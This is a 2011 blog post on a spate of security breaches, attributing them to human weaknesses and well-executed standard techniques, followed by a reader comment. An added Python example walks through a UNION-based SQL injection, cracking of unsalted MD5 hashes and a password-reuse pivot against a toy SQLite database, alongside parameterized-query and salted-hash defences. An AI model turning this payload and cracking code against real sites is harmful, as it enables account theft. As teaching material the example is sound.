
Communications of the ACM


Why Have There Been So Many Security Breaches Recently?

Carnegie Mellon Associate Professor Jason Hong

We're almost five months into 2011 and we've already seen a large number of sensational security breaches. 

Just to recount, here are some of the breaches just this year:
  • HBGary Federal, a Beltway computer security firm, had all of its email stolen and posted on BitTorrent. The incident also raised a lot of questions about the ethics of the work the firm was being paid to do in the first place.
  • Computers used by the Australian Prime Minister and other ministers were hacked, giving the intruders access to several thousand sensitive emails.
  • A similar attack hit computers maintained by the Canadian government, giving the attackers access to classified federal information.
  • Comodo Group had a registration-authority account compromised, and the intruder used it to issue fraudulent SSL certificates for several well-known domains.
  • RSA was breached through a spear-phishing email carrying a spreadsheet attachment with an embedded zero-day Flash exploit, and information related to its SecurID tokens was taken.
  • The Epsilon mailing-list service, which maintained mailing lists for many large corporations, had its databases hacked, quite possibly through a phishing attack.
  • Oak Ridge National Laboratory was hit by a phishing attack, with some data exfiltrated.
  • The PlayStation Network was hacked, with over 65 million accounts compromised, including names, street addresses, email addresses, and purchase histories. It is not clear from Sony's public statement whether credit card and password data were stolen.
The scary part is, it's only going to get worse.
There has been a rise in the sophistication of attacks over the past few years. These attackers, who range from script kiddies to criminals to state-sponsored cyberwarriors, have been all too successful in breaking into online systems.
There are two interesting observations here. The first is that these attacks have shifted from just directly attacking a computer system, an attack model that computer security specialists are somewhat good at defending against, towards also exploiting the human vulnerabilities in these systems.
By human vulnerabilities, I mean all of the misunderstandings, laxness, and cognitive and social biases that arise with the people who use computer systems. The list of human vulnerabilities is long: poor interfaces that are hard to understand, interfaces that are easy to misconfigure, guessable passwords, reused passwords, tricking people into installing malware, tricking people into opening documents (which carry zero-day exploits), and on, and on, and on.
These human vulnerabilities are clearly a major weakness, but also a puzzling blind spot both from a research perspective and from an industry perspective. Well, actually, it's not that puzzling. People are messy. We all have a wide range of experiences, knowledge, and motivations, and so it's natural, so tempting, to just buy the "magic black box" that claims to solve all your security problems and avoid having to actually deal with the messiness. Just go to any industry conference (like RSA), and you'll see what I mean: vendors selling row after row of magic black boxes. And by doing so, we computer professionals can rest comfortably in the conventional wisdom that users are just stupid, keep on blaming the user, and never force ourselves to adapt to smarter attackers.
The other observation is that none of these hacks are actually new or innovative (and no, most zero-day attacks are not that innovative, unless you count buffer-overflow attacks as innovative). We don't know yet about the Sony Playstation Network attack, but I'm willing to bet that it didn't use any advanced techniques either. 
Instead, what is fascinating here is the sophistication of the execution. The attackers are more patient, adept at using a wide range of tools, and very capable of progressively exploiting smaller vulnerabilities into larger ones. It's analogous to the transition in martial arts from single schools of thought to cross-training and mixed martial arts. These recent attacks have been highly creative, flexible to the situation, and make full use of a combination of techniques.
For example, in the Epsilon case, it looks like the attackers were using spear phishing attacks for several months, trying to bait low level employees at several mailing list companies. While there are few details, there are several interesting questions. How did the attackers know which employees to target? Did the attackers know how to format the spear phishing email so it looked appropriate? Did they know when to send the malware for maximum effect? I suspect the answer to all of these is yes. 
The HBGary case is also an impressive case study. It started with a SQL injection on the company's web site, which gave the attackers the user database and its password hashes; they then ran a standard dictionary crack on those hashes, exploited password reuse to remotely wipe the (now former) CEO's iPad and take over his Twitter account, and used a spear-phishing email to obtain the password for another site. Again, all standard techniques, just really well executed.
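To make that chain concrete, here is an added worked example (my own illustration for this post, not code from the original article and not HBGary's actual systems) that walks the first steps against a toy in-memory SQLite site: a string-concatenated page lookup is the injection point, a UNION payload pulls the users table out through it, one precomputed MD5 table cracks every unsalted hash at once, and a constructed second service shows the password-reuse pivot. Beside each weak piece sits the hardened form: a parameterized, validated lookup, and a per-user-salted slow KDF. The user names, passwords, wordlist, schema and the `OTHER_SERVICE` table are all constructed for this example.

```python
import hashlib
import hmac
import os
import sqlite3

# Constructed sample data (assumption: invented accounts, not any real system).
# The CMS stores passwords as unsalted MD5, the kind of store that a SQL
# injection turns straight into a list of crackable passwords.
SAMPLE_USERS = [("admin", "Password1"), ("editor", "letmein"), ("ops", "s3cur3!Pass#2011")]

# Small constructed wordlist standing in for a real password dictionary.
WORDLIST = ["123456", "password", "Password1", "letmein", "qwerty", "welcome"]

# Constructed second service (say, the firm's mail or remote-admin login) that
# accepts the same credentials as the CMS for one of the users.
OTHER_SERVICE = {"admin": "Password1", "editor": "Tr0ub4dor&3"}


def build_db(users=SAMPLE_USERS):
    """In-memory SQLite CMS: a pages table and a users table of MD5 hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("INSERT INTO pages (title, body) VALUES ('Home', 'Welcome')")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pw_md5 TEXT)")
    conn.executemany(
        "INSERT INTO users (username, pw_md5) VALUES (?, ?)",
        [(u, hashlib.md5(p.encode()).hexdigest()) for u, p in users],
    )
    return conn


def vulnerable_page_lookup(conn, page_id):
    """Step 1, the injection point: the request parameter is spliced into SQL."""
    sql = "SELECT title, body FROM pages WHERE id = " + page_id
    return conn.execute(sql).fetchall()


def safe_page_lookup(conn, page_id):
    """Hardened lookup: validate the input, then bind it as a parameter."""
    if not page_id.isdigit():
        raise ValueError("page id must be a non-negative integer")
    return conn.execute("SELECT title, body FROM pages WHERE id = ?", (int(page_id),)).fetchall()


# A UNION payload with the same column count as the legitimate query makes the
# page endpoint return rows from the users table instead.
DUMP_PAYLOAD = "0 UNION SELECT username, pw_md5 FROM users"


def dump_hashes(conn):
    """Step 2: use the injection to read every username and password hash."""
    return dict(vulnerable_page_lookup(conn, DUMP_PAYLOAD))


def crack_unsalted_md5(hash_by_user, wordlist=WORDLIST):
    """Step 3: without salts, one precomputed table cracks all users at once."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {u: table[h] for u, h in hash_by_user.items() if h in table}


def reuse_pivot(cracked, other_service=OTHER_SERVICE):
    """Step 4: which cracked CMS passwords also open the other service?"""
    return {u: p for u, p in cracked.items() if other_service.get(u) == p}


# Hardened password store: a random per-user salt and a slow KDF, so the
# attacker cannot share one lookup table across users and every guess costs
# a full PBKDF2 run.
def store_password(password, iterations=100_000):
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest, iterations


def verify_password(stored, candidate):
    salt, digest, iterations = stored
    guess = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, iterations)
    return hmac.compare_digest(guess, digest)


if __name__ == "__main__":
    conn = build_db()
    hashes = dump_hashes(conn)
    cracked = crack_unsalted_md5(hashes)
    print("dumped via injection:", hashes)
    print("cracked from wordlist:", cracked)
    print("reused on other service:", reuse_pivot(cracked))
```

Two things carry over to real systems. The parameterized lookup rejects the payload before it ever reaches the SQL engine, so step 2 never happens; and with a per-user salt and a slow KDF, step 3 stops being one table lookup for the whole dump and becomes a separate full-cost dictionary run per account, which is exactly the kind of "smaller vulnerability" that no longer compounds into a larger one.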
These kinds of security breaches will be a long-term problem that we will be struggling with for the next ten to twenty years. The only effective strategy I see is to take a three-pronged approach. First, get research and industry to develop new best practices, create better tools, and have better training of software developers. Second, complement these technical approaches with a stronger legal structure that can properly incentivize companies to take stronger measures in protecting customer data. Finally, develop new ways of actually addressing the human vulnerabilities, in the form of simpler and better designed user interfaces, more research to gain a deeper understanding of human biases and social influences in decision making, and better ways of motivating and training people so that they are effective in the face of these ongoing attacks. 



James Byrd

The single common thread to the above (and most breaches) is the failure to architecturally separate data. Everything in a lump with access rules is more convenient than designing systems that put what is needed where it is needed. Significant breaches come when someone (or some system) has access to more data than they need. Rules can be broken; architectural separation is harder - you have to hop domains, not just abuse the rules. It's still possible, it's just a lot more work.
